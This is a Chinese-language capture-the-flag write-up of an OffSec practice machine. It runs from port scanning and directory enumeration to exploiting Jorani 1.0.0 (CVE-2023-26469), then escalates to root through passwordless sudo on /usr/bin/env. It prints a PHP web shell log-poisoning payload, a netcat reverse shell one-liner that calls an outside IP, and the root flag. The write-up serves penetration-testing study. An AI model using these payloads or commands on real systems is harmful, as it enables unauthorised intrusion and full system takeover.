主要知识点

• /usr/bin/env提权

具体步骤

执行nmap扫描

Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-27 19:54 China Standard Time
Nmap scan report for 192.168.221.109
Host is up (0.069s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_  256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现80端口开放，但看不到任何内容，所以dirb一下,发现了很多路径开放，也有很多潜在的线索

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.221.109
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes:   307,400,403,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.gitattributes       (Status: 200) [Size: 505]
/.gitignore           (Status: 200) [Size: 477]
/composer.json        (Status: 200) [Size: 973]
/composer.lock        (Status: 200) [Size: 91293]
/docker-compose.yml   (Status: 200) [Size: 499]
/Dockerfile           (Status: 200) [Size: 879]
/phpunit.xml          (Status: 200) [Size: 465]
/README.md            (Status: 200) [Size: 4958]
/sonar-project.properties (Status: 200) [Size: 336]
/sql/                 (Status: 200) [Size: 2898]
/tests                (Status: 301) [Size: 318] [--> http://192.168.221.109/tests/]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================

 

最终发现一个登录页面，是Jorani v1.0.0,

 

搜索一下相应的vulnerability信息，发现了

Jorani 1.0.0 - Remote Code Execution (CVE-2023-26469) - Vulnerability & Exploit Database

按照其中描述的exp，在本地执行

PS C:\Users\Administrator\Documents\OFFSEC\Practice\GoToWork\Jordak> python .\CVE_Jorani.py http://192.168.221.109/!\ Do not use this if you are not authorized to /!\[?] POC made by @jrjgjk (Guilhem RIOUX)[?] Header used for exploit: FNUAWCDCVYLM
[?] Requesting session cookie
[?] Poisonning log file with payload: '<?php if(isset($_SERVER['HTTP_FNUAWCDCVYLM'])){system(base64_decode($_SERVER['HTTP_FNUAWCDCVYLM']));} ?>'
[?] Set path traversal to '../../application/logs'
[+] Recoveredd CSRF Token: 8d68027d90188dcbad14f3ad9ccaf80e
[?] Accessing log file: log-2024-10-27
jrjgjk@jorani(PSEUDO-TERM)
$ iduid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)jrjgjk@jorani(PSEUDO-TERM)
$ rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.192 80 >/tmp/f

但是exp自带的命令行并不是一个真正的shell,于是我们需要建立一个reverse shell先，发现 jordak属于sudo组，并且可以不需要密码执行/usr/bin/env

jordak@jordak:/home/jordak$ id
id
uid=1000(jordak) gid=1000(jordak) groups=1000(jordak),27(sudo)
jordak@jordak:/home/jordak$ sudo -l
sudo -l
Matching Defaults entries for jordak on jordak:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser jordak may run the following commands on jordak:(ALL : ALL) ALL(ALL) NOPASSWD: /usr/bin/env

搜索一下GTFObings,得到 /usr/bin/env可以使用如下方式提权

提权成功

sudo /usr/bin/env /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt
47f2032a288a0d113c92c07df6a9ad18